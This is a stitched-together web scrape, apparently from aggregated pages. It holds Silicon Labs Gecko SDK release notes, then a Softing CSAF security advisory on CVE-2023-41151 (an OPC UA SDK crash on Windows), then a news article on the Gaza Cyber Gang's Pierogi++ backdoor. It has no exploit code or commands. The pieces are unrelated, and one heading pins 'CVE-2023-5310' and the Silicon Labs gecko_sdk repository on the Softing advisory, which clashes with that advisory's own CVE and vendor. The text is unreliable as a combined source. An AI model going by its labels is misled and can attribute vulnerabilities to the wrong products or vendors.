\- Thread 1.3.0 certification compliance with Thread Test Harness v59.0 for SoC and Host-RCP architectures  
\- Thread 1.3.1 feature support - Experimental  
\- Crash Handler support  
\- TrustZone Evaluation support  
\- MR21 support for OpenThread RCP – Production  
**Multiprotocol**  
\- Concurrent Listening support (RCP) – MG21 and MG24  
\- Concurrent Multiprotocol (CMP) Zigbee NCP + OpenThread RCP – production  
\- Dynamic Multiprotocol Bluetooth + Concurrent Multiprotocol (CMP) Zigbee and OpenThread support on SoC

Release Notes

Proprietary Flex SDK

3.7.0.0

**Connect**  
\- Support of SUN-FSK and SUN-OFDM  
\- Hardware Abstraction Layer update  
\- Added Hardware Support: MG24 QFN40, EFRBG22-E, EFR32xG28 Explorer Kit  
**RAIL SDK**  
\- Connect OFDM support for some Applications  
\- EFR32xG28 Proprietary 2.4 GHz 15.4 Standard PHY Support  
\- Added Hardware Support: MG24 QFN40, EFRBG22-E, EFR32xG28 Explorer Kit

Release Notes

USB Device Stack

1.2.0.0

\- Targeted quality improvements and bug fixes

Release Notes

Wi-SUN SDK

1.8.0.0

**Wi-SUN Stack**  
\- Added support for LFN multicast reception  
\- Added support for non-standard PHY configurations  
\- Added support for blocking sockets  
**Wi-SUN Application Improvements**  
\- Configurable LFN Support for all the applications  
\- Wi-SUN – SoC Network Measurement  
\- Wi-SUN – SoC (CoAP) Meter and Wi-SUN – SoC (CoAP) Collector

Release Notes

Z-Wave and Z-Wave Long Range 700/800 SDK Certified GA

7.21.0.0

\- BRD2705 Explorer kit includes new applications  
\- Various quality improvements  
\- Z-Wave PC-based Zniffer v6.48 released with CSV export feature

Release Notes

Zigbee EmberZNet SDK

7.4.0.0

**Zigbee**  
\- Zigbee R23 compliance  
\- Zigbee Smart Energy 1.4a compliance - production  
\- Zigbee GP 1.1.2 compliance - Alpha  
\- MG27 support - production  
\- Improved support for Secure Vault parts  
\- Sleepy support on NCP SPI (non-CPC) applications – Alpha  
**Multiprotocol**  
\- Concurrent Listening support (RCP) – MG21 and MG24  
\- Concurrent Multiprotocol (CMP) Zigbee NCP + OpenThread RCP – production  
\- Dynamic Multiprotocol Bluetooth + Concurrent Multiprotocol (CMP) Zigbee and OpenThread support on SoC

Release Notes

**v4.3.2**

**v4.1.6**

**v4.2.4**

**v4.3.1**

**v4.1.5**

**v4.3.0**

**Gecko SDK (GSDK) Version 4.3.0.0**

Component

Version

Summary

Details

32-Bit MCU SDK

6.5.0.0

\- Added support for new OPNs

Release Notes

Bluetooth SDK

6.0.0.0

**Bluetooth**  
\- Bluetooth 5.4 support including Periodic Advertisements with Responses (PAwR) and Encrypted Advertisement Data (EAD) features  
\- Electronic Shelf Label (ESL) Service / Profile support - both Tag and Access Point (AP) roles  
\- Object Transfer Service / Profile support  
\- Periodic Advertisement Sync Transfer (PAST) support  
\- LE Privacy 1.2  
**Multiprotocol**  
\- Zigbee/OpenThread Concurrent Multiprotocol SoC sample app  
\- CPC GPIO expander module  
\- Zigbeed enhancements

Release Notes

Bluetooth Location Services

6.0.0.0

\- Some library variants now compile with Position Independent Code flags

Release Notes

Bluetooth Mesh SDK

5.0.0.0

\- Support for Mesh Protocol 1.1  
\- Support for Mesh Model 1.1  
\- Support for Mesh Binary Large Object Transfer  
\- Support for Mesh Device Firmware Update

Release Notes

Gecko Platform

4.3.0.0

\-Support for EFR32xG27 devices  
\-Power Manager update for optimized return from EM2  
\-CPC support for multiple SPI clients  
\-CPC remote peripheral (GPIO) access  
\-License change (to open-source zlib) for various platform files

Release Notes

OpenThread SDK

2.3.0.0

**OpenThread**  
Thread 1.3.1 (experimental)  
\- IPv4/v6 public internet connectivity: NAT64 improvements, optimization of published routes and prefixes in network data  
\- DNS enhancements for OTBR  
\- Thread over Infrastructure (TREL)  
Network Diagnostics (experimental)  
\- Child supervision by parent  
\- Additional link quality information in child table  
\- Uptime for routers  
**Multiprotocol**  
\- Zigbee/OpenThread Concurrent Multiprotocol SoC sample app  
\- CPC GPIO expander module  
\- Zigbeed enhancements

Release Notes

Proprietary Flex SDK

3.6.0.0

**RAIL Apps and Library:**  
\- FG23 Direct Mode settings in Radio Configurator  
\- WM-BUS T+C PHY support  
\- FGM230S WM-BUS PHYs and Application support  
\- RAIL NCP Sample Applications  
\- PSM support for DSSS-OQPSK Long Range PHYs  
**Connect Apps and Stack:**  
\- Connect NCP support  
\- FGM230S Connect support

Release Notes

USB Device Stack

1.1.2.0

\- Internal modifications to reduce USB stack code size

Release Notes

Wi-SUN SDK

1.6.0.0

**Wi-SUN Stack**  
\- EFR32FG28 support  
\- Connection time improvements  
\- LFN support improvements  
**Wi-SUN Applications**  
\- Firmware over-the-air update  
\- Wi-SUN configurator update

Release Notes

Z-Wave and Z-Wave Long Range 700/800 SDK Pre-Certified GA

7.20.0.0

\- FG28/ZG28-based radio boards BRD4401A/B supported  
\- Z-Wave FLiRS inclusion performance improved in large networks  
\- Z-Wave Long Range wakeup beam performance improved  
\- Simplified application development by moving logic from the Apps to ZAF  
\- 800 DevKit (BRD2603) includes new applications and Multilevelsensor extended with new features  
\- Improved documentation to better support development from idea to certification  
\- Z-Wave Simulator available for Z-Wave Alliance members  
\- Z-Wave PC-based Zniffer v4.67 released

Release Notes

Zigbee EmberZNet SDK

7.3.0.0

**Zigbee**  
Zigbee R23 compliance, with these Security enhancements among others:  
\- Dynamic link key negotiation  
\- Device interview to query devices before they are allowed to join  
\- Trust Center Swap Out to replace an existing Trust Center with a new one  
\- Frame Counter Synchronization  
Zigbee Direct Device (ZDD) support for:  
\- Onboarding/commissioning  
\- Communication to all Zigbee devices without a hub (Alpha), using Bluetooth LE  
Zigbee Smart Energy 1.4a compliance (Alpha)  
Enhancements to Zigbee GP APIs  
New Zigbee Security upgrade component for moving encryption keys from cleartext NVM3 tokens into secure storage  
**Multiprotocol**  
Zigbee/OpenThread Concurrent Multiprotocol SoC sample app  
CPC GPIO expander module  
Zigbeed enhancements

Release Notes

**v4.2.3**

**v4.2.2**

**v4.2.1**

**Gecko SDK (GSDK) Version 4.2.1.0**

**WARNING:** The Bluetooth mesh SDK is not included in GSDK 4.2.1.0, because this version of the Bluetooth mesh SDK contains material that is not yet released to the public by the Bluetooth SIG.

Current Bluetooth mesh users should not update to this version, as your current Bluetooth mesh SDK will be deleted. If you do install it, you can revert to version 4.1.4 or earlier by installing it from the Tags tab.

Alternatively, if you are a Bluetooth SIG member, you can obtain a version based on the upcoming Bluetooth mesh 1.1 specification by raising a Silicon Labs Salesforce ticket with BTMesh as the Software Solution.

Component

Version

Summary

Details

32-Bit MCU SDK

6.4.1.0

\- Underlying platform changes only

Release Notes

Bluetooth SDK

5.1.0.0

\- Targeted quality improvements and bug fixes

Release Notes

Bluetooth Location Services

5.1.0.0

\- Underlying code changes only

Release Notes

Gecko Platform

4.2.1.0

\- Targeted quality improvements and bug fixes

Release Notes

OpenThread SDK

2.2.1.0

\- Targeted quality improvements and bug fixes

Release Notes

Proprietary Flex SDK

3.5.1.0

\- Targeted quality improvements and bug fixes

Release Notes

USB Device Stack

1.1.1.0

\- Targeted quality improvements and bug fixes

Release Notes

Wi-SUN SDK

1.5.0.0

\- EFR32FG25 launch support  
\- Enhancements to the Border Router RCP  
\- Other targeted quality improvements and bug fixes

Release Notes

Z-Wave and Z-Wave Long Range 700/800 SDK GA

7.19.1.0

\- Certified according to the approved 2022 Specification test suite  
\- Various bug fixes, refer to release notes

Release Notes

Zigbee EmberZNet SDK

7.2.1.0

\- Multiprotocol: Zigbeed now supports coex EZSP commands  
\- Other targeted quality improvements and bug fixes

Release Notes

**Full Changelog**: v4.2.0...v4.2.1

CVE-2023-5310: Releases · SiliconLabs/gecko_sdk

An uncaught exception issue discovered in Softing OPC UA C++ SDK before 6.30 for Windows operating system may cause the application to crash when the server wants to send an error packet, while socket is blocked on writing.

Publisher: Softing Industrial Automation GmbH

Document category: csaf\_security\_advisory

Initial release date: 2023-11-07T11:00:00.000Z

Engine: Secvisogram .2.2.15

Current release date: 2023-11-07T11:00:00.000Z

Build Date: 2023-11-22T07:46:18.833Z

Current version: 1.0.0

Status: final

CVSSv3.1 Base Score: 7.5

Severity: high

Original language: en-US

Language:

Also referred to:

**Vulnerabilities****(CVE-2023-41151)**

When the Server want to send an error packet, while socket is blocked on writing, the server may crash unexpectedly and must be restarted This issue only occurs on Windows operating system.

CWE:

CWE-248:Uncaught Exception

Discovery date:

2023-08-22T00:00:00.000Z

**Product status****Known affected**

Product

CVSS-Vector

CVSS Base Score

Softing OPC UA C++ SDK <= 6.20.1

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5

Softing Secure Integration Server <= V1.22

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5

Softing OPC Suite <= V5.30

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

7.5

**Fixed**

*   Softing OPC UA C++ SDK V6.30
*   Softing Secure Integration Server V1.30

**Softing Industrial Automation GmbH**

Namespace: https://industrial.softing.com

Softing PSIRT - contact us at \[email protected\]

**Revision history**

Version

Date of the revision

Summary of the revision

1.0.0

2023-11-07T11:00:00.000Z

Initial version

**Disclaimer**

The information provided in this disclosure is provided "as is" without warranty of any kind. Softing disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Softing or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Softing or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-41151: SYT-2023-3: Uncaught exception vulnerability in OPC UA C++ SDK, Secure Integration Server and OPC Suite

A pro-Hamas threat actor known as Gaza Cyber Gang is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.
The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.
"Recent Gaza Cybergang activities show

Malware / Threat Analysis

A pro-Hamas threat actor known as **Gaza Cyber Gang** is targeting Palestinian entities using an updated version of a backdoor dubbed Pierogi.

The findings come from SentinelOne, which has given the malware the name Pierogi++ owing to the fact that it's implemented in the C++ programming language unlike its Delphi- and Pascal-based predecessor.

"Recent Gaza Cybergang activities show consistent targeting of Palestinian entities, with no observed significant changes in dynamics since the start of the Israel-Hamas war," security researcher Aleksandar Milenkoski said in a report shared with The Hacker News.

Gaza Cyber Gang, believed to be active since at least 2012, has a history of striking targets throughout the Middle East, particularly Israel and Palestine, often leveraging spear-phishing as a method of initial access.

UPCOMING WEBINAR

Beat AI-Powered Threats with Zero Trust - Webinar for Security Professionals

Traditional security measures won't cut it in today's world. It's time for Zero Trust Security. Secure your data like never before.

Join Now

Some of the notable malware families in its arsenal include BarbWire, DropBook, LastConn, Molerat Loader, Micropsia, NimbleMamba, SharpStage, Spark, Pierogi, PoisonIvy, and XtremeRAT among others.

The threat actor is assessed to be a composite of several sub-groups that share overlapping victimology footprints and malware, such as Molerats, Arid Viper, and a cluster referred to as Operation Parliament by Kaspersky.

In recent months, the adversarial collective has been linked to a series of attacks that deliver improvised variants of its Micropsia and Arid Gopher implants as well as a new initial access downloader dubbed IronWind.

The latest set of intrusions mounted by Gaza Cyber Gang has been found to leverage Pierogi++ and Micropsia. The first recorded use of Pierogi++ goes back to late 2022.

Attack chains are characterized by the use of decoy documents written in Arabic or English and pertaining to matters of interest to Palestinians to deliver the backdoors.

Cybereason, which shed light on Pierogi in February 2020, described it as an implant that allows attackers to spy on targeted victims and that the "commands used to communicate with the \[command-and-control\] servers and other strings in the binary are written in Ukrainian."

"The backdoor may have been obtained in underground communities rather than home-grown," it assessed at the time.

Both Pierogi and Pierogi++ are equipped to take screenshots, execute commands, and download attacker-provided files. Another notable aspect is that the updated artifacts no longer feature any Ukrainian strings in the code.

SentinelOne's investigation into Gaza Cyber Gang's operations have also yielded tactical connections between two disparate campaigns referred to as Big Bang and Operation Bearded Barbie, in addition to reinforcing ties between the threat actor and WIRTE, as previously disclosed by Kaspersky in November 2021.

The sustained focus on Palestine notwithstanding, the discovery of Pierogi++ underscores that the group continues to refine and retool its malware to ensure successful compromise of targets and to maintain persistent access to their networks.

"The observed overlaps in targeting and malware similarities across the Gaza Cybergang sub-groups after 2018 suggests that the group has likely been undergoing a consolidation process," Milenkoski said.

"This possibly includes the formation of an internal malware development and maintenance hub and/or streamlining supply from external vendors."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#c++